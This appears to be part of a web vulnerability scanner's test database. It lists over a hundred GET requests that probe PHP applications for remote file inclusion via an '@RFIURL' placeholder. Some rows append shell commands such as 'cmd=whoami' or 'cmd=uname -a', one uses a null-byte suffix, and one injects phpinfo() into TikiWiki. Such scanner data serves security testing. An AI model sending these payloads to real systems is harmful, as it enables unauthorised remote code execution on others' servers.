"005855","5292","c","/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005856","5292","c","/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005857","5292","c","/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005858","5292","c","/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005859","5292","c","/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005860","5292","c","/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005861","5292","c","/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005862","5292","c","/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005863","5292","c","/spellcheckwindowframeset.php?SpellIncPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005864","5292","c","/squirrelcart/cart_content.php?cart_isp_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005865","5292","c","/src/ark_inc.php?cfg_pear_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005866","5292","c","/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005867","5292","c","/src/scripture.php?pageHeaderFile=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005868","5292","c","/starnet/themes/c-sky/main.inc.php?cmsdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005869","5292","c","/start.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005870","5292","c","/start.php?pg=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005871","5292","c","/stat_modules/users_age/module.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005872","5292","c","/stats.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005873","5292","c","/stats.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005874","5292","c","/stphpapplication.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005875","5292","c","/stphpbtnimage.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005876","5292","c","/stphpform.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005877","5292","c","/str.php?p=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005878","5292","c","/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005879","5292","c","/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005880","5292","c","/strload.php?LangFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005881","5292","c","/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005882","5292","c","/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005883","5292","c","/styles.php?toroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005884","5292","c","/styles/default/global_header.php?installed=23&domain=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005885","5292","c","/submit_abuse.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005886","5292","c","/submit_comment.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005887","5292","c","/subscp.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005888","5292","c","/suite/index.php?pg=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005889","5292","c","/suite/index.php?pg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005890","5292","c","/supasite/admin_auth_cookies.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005891","5292","c","/supasite/admin_mods.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005892","5292","c","/supasite/admin_news.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005893","5292","c","/supasite/admin_settings.php?supa[include_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005894","5292","c","/supasite/admin_topics.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005895","5292","c","/supasite/admin_users.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005896","5292","c","/supasite/admin_utilities.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005897","5292","c","/supasite/backend_site.php?supa[include_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005898","5292","c","/supasite/common_functions.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005899","5292","c","/supasite/site_comment.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005900","5292","c","/supasite/site_news.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005901","5292","c","/support/include/open_form.php?include_dir=@RFIURL?cmd=pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005902","5292","c","/support/index.php?main=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005903","5292","c","/surveys/survey.inc.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005904","5292","c","/sw/lib_comment/comment.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005905","5292","c","/sw/lib_find/find.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005906","5292","c","/sw/lib_session/session.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005907","5292","c","/sw/lib_up_file/file.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005908","5292","c","/sw/lib_up_file/find_file.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005909","5292","c","/sw/lib_user/find_user.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005910","5292","c","/sw/lib_user/user.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005911","5292","c","/sys/code/box.inc.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005912","5292","c","/system/ImageImageMagick.php?glConf[path_system]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005913","5292","c","/system/ImageImageMagick.php?glConf[path_system]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005914","5292","c","/system/_b/contentFiles/gBIndex.php?gBRootPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005915","5292","c","/system/admin/include/item_main.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005916","5292","c","/system/admin/include/upload_form.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005917","5292","c","/system/command/admin.cmd.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005918","5292","c","/system/command/download.cmd.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005919","5292","c","/system/funcs/xkurl.php?PEARPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005920","5292","c","/system/includes/pageheaderdefault.inc.php?_sysSessionPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005921","5292","c","/system/login.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005922","5292","c","/tagit2b/tagmin/delTagUser.php?configpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005923","5292","c","/tags.php?BBCodeFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005924","5292","c","/taxonservice.php?dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005925","5292","c","/teatro/pub/pub08_comments.php?basePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005926","5292","c","/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005927","5292","c","/template.php?actionsPage=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005928","5292","c","/template.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005929","5292","c","/template.php?pagina=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005930","5292","c","/template/Noir/index.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005931","5292","c","/template/Vert/index.php?pageAll=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005932","5292","c","/template/Vert/index.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005933","5292","c","/template/barnraiser_01/p_new_password.tpl.php?templatePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005934","5292","c","/template/default/footer.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005935","5292","c","/template/default/test/header.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005936","5292","c","/template/gwb/user_bottom.php?config[template_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005937","5292","c","/template/purpletech/base_include.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005938","5292","c","/template/rwb/user_bottom.php?config[template_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005939","5292","c","/template/rwb/user_bottom.php?config[template_path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005940","5292","c","/template_csv.php?rInfo[content]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005941","5292","c","/templates/2blue/bodyTemplate.php?serverPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005942","5292","c","/templates/2blue/bodyTemplate.php?serverPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005943","5292","c","/templates/Official/part_userprofile.php?template_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005944","5292","c","/templates/barrel/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005945","5292","c","/templates/barrel/template.tpl.php?renderer=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005946","5292","c","/templates/barry/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005947","5292","c","/templates/be2004-2/index.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005948","5292","c","/templates/datumVonDatumBis.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005949","5292","c","/templates/default/header.inc.php?menu=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005950","5292","c","/templates/default/index_logged.php?main_loaded=1&cur_module=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005951","5292","c","/templates/default/tpl_message.php?right_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005952","5292","c","/templates/footer.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005953","5292","c","/templates/header.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005954","5292","c","/templates/mylook/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005955","5292","c","/templates/oerdec/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005956","5292","c","/templates/pb/language/lang_nl.php?temppath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005957","5292","c","/templates/penguin/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005958","5292","c","/templates/sidebar/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005959","5292","c","/templates/slashdot/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005960","5292","c","/templates/stylesheets.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005961","5292","c","/templates/text-only/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005962","5292","c","/templates/tmpl_dfl/scripts/index.php?dir[inc]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005963","5292","c","/theme/breadcrumb.php?rootBase=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005964","5292","c","/theme/default.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005965","5292","c","/theme/format.php?_page_content=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005966","5292","c","/theme/format.php?_page_css=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005967","5292","c","/theme/frames1.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005968","5292","c","/theme/frames1_center.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005969","5292","c","/theme/frames1_left.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005970","5292","c","/theme/frames1_top.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005971","5292","c","/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005972","5292","c","/theme/settings.php?pfad_z=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005973","5292","c","/theme/test1.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005974","5292","c","/theme/test2.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005975","5292","c","/theme/test3.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005976","5292","c","/theme/test4.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005977","5292","c","/theme/test5.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005978","5292","c","/theme/test6.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005979","5292","c","/themes.php?GLOBALS[theme_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005980","5292","c","/themes/blackorange.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005981","5292","c","/themes/container.php?theme_directory=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005982","5292","c","/themes/default/layouts/standard.php?page_include=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005983","5292","c","/themes/default/preview_post_completo.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005984","5292","c","/themes/header.php?theme_directory=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005985","5292","c","/themes/ubb/login.php?theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005986","5292","c","/themes/ubb/login.php?theme=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005987","5292","c","/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005988","40478","c","/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=@RFIURL","GET","PHP Version","","","","","TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.","",""
"005989","5292","c","/timedifference.php?la=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005990","5292","c","/toolbar.loudmouth.php?mainframe=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005991","5292","c","/tools/update_translations.php?_SESSION[path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005992","5292","c","/top.php?laypath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005993","5292","c","/toplist.php?f=toplist_top10&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005994","5292","c","/topsites/index.php?page=@RFIURL?&cmd=uname -a","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005995","5292","c","/towels-0.1/src/scripture.php?pageHeaderFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005996","5292","c","/track.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005997","5292","c","/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005998","5292","c","/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005999","5292","c","/ttCMS_path/lib/db/ez_sql.php?lib_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006000","5292","c","/twebs/modules/misc/usermods.php?ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006001","5292","c","/ubbt.inc.php?GLOBALS[thispath]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006002","5292","c","/unavailable.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006003","5292","c","/unsubs.php?scdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006004","5292","c","/up.php?my[root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
